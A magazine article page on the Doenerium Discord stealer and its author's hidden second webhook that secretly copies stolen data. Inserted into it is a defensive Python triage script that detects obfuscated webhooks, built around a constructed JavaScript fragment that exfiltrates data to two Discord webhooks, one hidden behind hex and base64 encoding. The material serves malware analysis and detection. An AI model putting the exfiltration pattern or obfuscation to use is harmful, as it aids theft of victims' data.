Page 70 - Cyber Defense eMagazine December 2022 Edition

Once the malware has harvested all of this data, it assembles a complete virtual profile of the victim, archives it and uploads the archive to gofile.io, a free file-sharing and storage platform. gofile.io serves as the drop site: the malware hosts the archive there and hands the download link to the hacker.



            Part Two: The Backdoor Twist

Further research into the attack revealed that doener2323, the malware author, had also created a second GitHub repository called 1337wtf1337. The two accounts were linked through a technique known as "dual hooking": in addition to the Discord webhook that the hacker configures in the malware (the destination to which exfiltrated data is sent), the malware contains a second, hardcoded Discord webhook associated with doener2323.

In other words, everything a hacker obtained with this malware was automatically copied to doener2323 as well.
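The dual hook is cheap to spot once you know to look for it: a stealer that can post to two distinct Discord webhooks is reporting to someone other than its operator. The triage script below is an added example, not Doenerium's code or anything from doener2323's repositories. It extracts every Discord webhook URL from a JavaScript sample, looking through two obfuscation layers that are common in such stealers (assumed here, not described on the page): `\xNN` string escapes and base64 blobs. The sample script, webhook ids and tokens are constructed for the example.

```python
"""Triage helper for "dual hooked" Discord stealers.

Counts the distinct Discord webhooks a JavaScript sample can post to. Two or more
means the operator who configured the malware is being back-doored as well.
Added example; the sample below is constructed and its ids/tokens are made up.
"""
import base64
import re

# Discord webhook URL: the 17-20 digit id identifies the hook, the token authorises posting.
WEBHOOK_RE = re.compile(
    r"https?://(?:canary\.|ptb\.)?discord(?:app)?\.com/api/webhooks/(\d{17,20})/([A-Za-z0-9_-]{20,})"
)
# Assumed obfuscation layers: "\x68\x74\x74\x70" string escapes and long base64 runs.
HEX_ESC_RE = re.compile(r"\\x([0-9a-fA-F]{2})")
B64_RE = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")


def unescape_hex(text: str) -> str:
    """Turn JavaScript \\xNN escapes back into characters."""
    return HEX_ESC_RE.sub(lambda m: chr(int(m.group(1), 16)), text)


def decode_b64_candidates(text: str) -> list[str]:
    """Decode every long base64-looking run; runs that are not valid base64 are skipped."""
    decoded = []
    for blob in B64_RE.findall(text):
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-8", "ignore"))
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
    return decoded


def find_webhooks(source: str) -> dict[str, str]:
    """Map webhook id -> full URL for every webhook reachable after de-obfuscation."""
    layers = [source, unescape_hex(source)]
    for blob in decode_b64_candidates(source):
        # A base64 blob may itself hold hex-escaped text, so unescape decoded layers too.
        layers += [blob, unescape_hex(blob)]
    hooks = {}
    for layer in layers:
        for m in WEBHOOK_RE.finditer(layer):
            hooks[m.group(1)] = m.group(0)
    return hooks


def classify(source: str) -> str:
    """'dual-hook' when the sample can report to two or more distinct webhooks."""
    n = len(find_webhooks(source))
    return "dual-hook" if n >= 2 else "single-hook" if n == 1 else "no-hook"


# --- constructed sample (not real malware; ids and tokens are made up) ---------------
OPERATOR_HOOK = "https://discord.com/api/webhooks/111111111111111111/operatorTOKENoperatorTOKEN-1234_5678"
AUTHOR_HOOK = "https://discord.com/api/webhooks/222222222222222222/authorTOKENauthorTOKENauthor-9876_5432"


def hex_escape(s: str) -> str:
    """Encode a string the way obfuscators emit literals: one \\xNN per byte."""
    return "".join(f"\\x{b:02x}" for b in s.encode())


# In a real sample these literals arrive already encoded; building them here keeps the
# example self-contained. The author's hook is hex-escaped and then base64-wrapped.
SAMPLE_JS = f"""
const config = {{ webhook: "{OPERATOR_HOOK}" }};   // what the operator configured
const _0x1a = "{base64.b64encode(hex_escape(AUTHOR_HOOK).encode()).decode()}";
function send(payload) {{
  post(config.webhook, payload);
  post(atob(_0x1a), payload);   // the silent second copy to the author
}}
"""

if __name__ == "__main__":
    for hook_id, url in find_webhooks(SAMPLE_JS).items():
        print(hook_id, url)
    print(classify(SAMPLE_JS))  # dual-hook
```

Run it against a cloned stealer before deploying it in a lab, or over a quarantined sample during incident triage: a "dual-hook" verdict means the second webhook id is an indicator worth recording, since it identifies the author's collection point rather than the operator's. Heavier obfuscation (string-array rotation, custom decoders) needs a real de-obfuscator or dynamic capture of outbound webhook calls; the layers above only cover the two simple encodings this example assumes.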

The dual hook was removed on September 3, 2022, but not before Doener had created a separate, completely obfuscated JavaScript file. Once decoded, this file led to an open Discord server used to share the active hackers' profits and to keep users informed about new features and fixes.

Initially, Doener2323 and their partners were not shy about telling other Discord users what they were after. They openly explained that the purpose was monetization and that the hidden webhook was part of a larger crypto mining operation run by Doener2323, which infects every victim lured in by the active hackers using Doenerium.
When other users started to catch on, Doener became less enthusiastic about the possibility of sharing the spoils with them and removed them from the Discord chat.



            Recommendations


This attack (and its double-crossing backdoor) teaches us that nothing comes free, not even the stolen fruits of malware. The hackers who used this publicly accessible malware to steal sensitive data were in turn hacked themselves by a malware author growing their own crypto mining operation.

Like many dangerous phishing attacks, this sophisticated attack began with a simple email. Considering that about 1 in 5 phishing attempts evade Microsoft's default security offering and reach users' inboxes, it is essential that security leaders ensure their organizations are equipped with the most advanced safeguards.

The first line of defense against this type of attack must be user education around email security. Regular email security drills help employees identify genuinely suspicious content, remind them not to open unfamiliar files, links or attachments, and prompt them to double-check the sender's identity. Organizations should also establish a standardized process for employees to follow when they receive a suspicious email or link.







            Copyright © 2022, Cyber Defense Magazine. All rights reserved worldwide.